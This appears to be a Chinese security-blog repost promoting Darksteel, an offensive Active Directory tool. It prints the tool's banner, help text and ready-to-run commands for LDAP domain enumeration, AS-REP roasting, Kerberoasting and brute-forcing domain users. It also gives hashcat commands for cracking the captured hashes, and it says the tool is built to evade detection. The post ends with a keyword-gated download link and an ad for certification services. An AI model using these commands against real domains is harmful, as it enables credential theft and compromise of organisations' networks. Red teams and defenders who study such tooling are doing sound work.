darksteel.exe ldap -d dc.domain.com -n domain.com -m computer
____ ______ ____ __ __ ____ ______ ____ ____ __
/ _` / _ / _` / / / _` /__ _/ _` / _` /
/ L L /'/' ,L_/_/ / L_ L_
__ , / , < /___ _L _L _
_ / \ \ \` / L L L L
____/ _ _ _ _ _ _\ `____ _ ____/ ____/ ____/
/___/ /_//_//_// //_//_/ /_____/ /_/ /___/ /___/ /___/
v2.0.0
[*] Domain Computers:
WIN-KQH5FQSIJSH
DESKTOP-AO8D722
DESKTOP-DO7D913
WIN-7UI852PL
EXCHANGESERVER
声明:本文介绍的安全工具和项目均来源于网络,仅供安全研究和学习使用。如果用于其他目的,使用者需自行承担法律责任,与工具作者和本公众号无关。为了提供更好的阅读体验,现在只对常读和星标的公众号展示大图推送。建议将Hack分享吧设为星标,以免错过内容!以下是一个工具的介绍。
Darksteel是一款用于域内自动化信息搜集和利用的工具。在渗透测试中,单独搜集域内信息往往繁琐,而漏洞利用也需要使用多个工具。因此,Darksteel项目的目标是解决域内信息搜集和漏洞利用的问题。该项目主要注重规避检测,暂未包含直接对域控进行攻击的利用。后续可能会添加绕过检测的利用方法。
功能演示:
- 可以使用本地账号进行认证查询,无需填写账号密码(-d参数需要填写域名)。
ldap
当我们拥有一个域内账号密码(hash),可以通过ldap进行搜集域内有用信息,如spn、委派、存活计算机等等信息,为域渗透进行准备
kerberos
针对kerberos漏洞进行利用
blast
爆破域用户
computerip
批量查询域内计算机对应的ip
____ ______ ____ __ __ ____ ______ ____ ____ __
_` / _ / _` / / / _` /__ _/ _` / _` /
/ L L /'/' ,L_/_/ / L_ L_
__ , / , < /___ _L _L _
_ / \ \ \` / L L L L
____/ _ _ _ _ _ _\ `____ _ ____/ ____/ ____/
/_//_//_// //_//_/ /_____/ /_/ /___/ /___/ /___/
v2.0.0
自动化域内信息搜集、kerberos利用工具
Usage:
darksteel [command]
Available Commands:
blast 爆破域内用户
completion Generate the autocompletion script for the specified shell
computerip 查询域内计算机的ip地址
help Help about any command
kerberos kerberos利用
ldap ldap查询
Flags:
--dc string 域控地址
--domain string 域名
--help help for darksteel
Use "darksteel [command] --help" for more information about a command.
darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -a
darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -z 管理员
主要功能:
使用实例:
LDAP:
-
当我们拥有一个域内账号密码(hash)时,可以通过LDAP搜集域内有用信息,如SPN、委派、存活计算机等,为域渗透做准备。
-
当我们想要查找域内某些关键字对应的用户或计算机时,可以使用关键字查询,找到管理员用户和管理员计算机。
darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -f "(objectClass=Computer)" -t cn,dNSHostName
darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -u user -p password(hash)
- 如果工具内没有提供所需查询内容,也可以使用LDAP语法进行查询。
Kerberos:
- 利用Kerberos可以在不需要域认证的情况下获取用户密钥,可以选择输出hashcat或john爆破格式(默认为hashcat)。爆破出来的密码即为该用户的密码。如果不指定目标用户,则需要一个域用户账号密码进行LDAP查询并输出所有可利用密钥。hashcat爆破命令:hashcat -m 18200 hash.txt pass.txt –force。
darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -t zz
darksteel.exe kerberos -m kerberoast -d 192.168.1.1 -n test.com -u user -p password(hash)
-
指定目标用户时,无需域用户认证。
-
如果目标用户设置了SPN,则可以输出密钥,可选择输出hashcat或john爆破格式(默认为hashcat)。爆破出来的密码即为该用户的密码。如果不指定目标用户,则需要一个域用户账号密码进行LDAP查询并输出所有可利用密钥。hashcat爆破命令:hashcat -m 13100 hash.txt pass.txt –force。
……
下载地址:请点击下方名片进入公众号,回复关键字【230908】获取下载链接。
信安考证:如果您需要考取各类安全证书,请联系我。价格优惠,组团更便宜,还赠送【潇湘信安】知识星球1年!可提供的证书包括CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001等。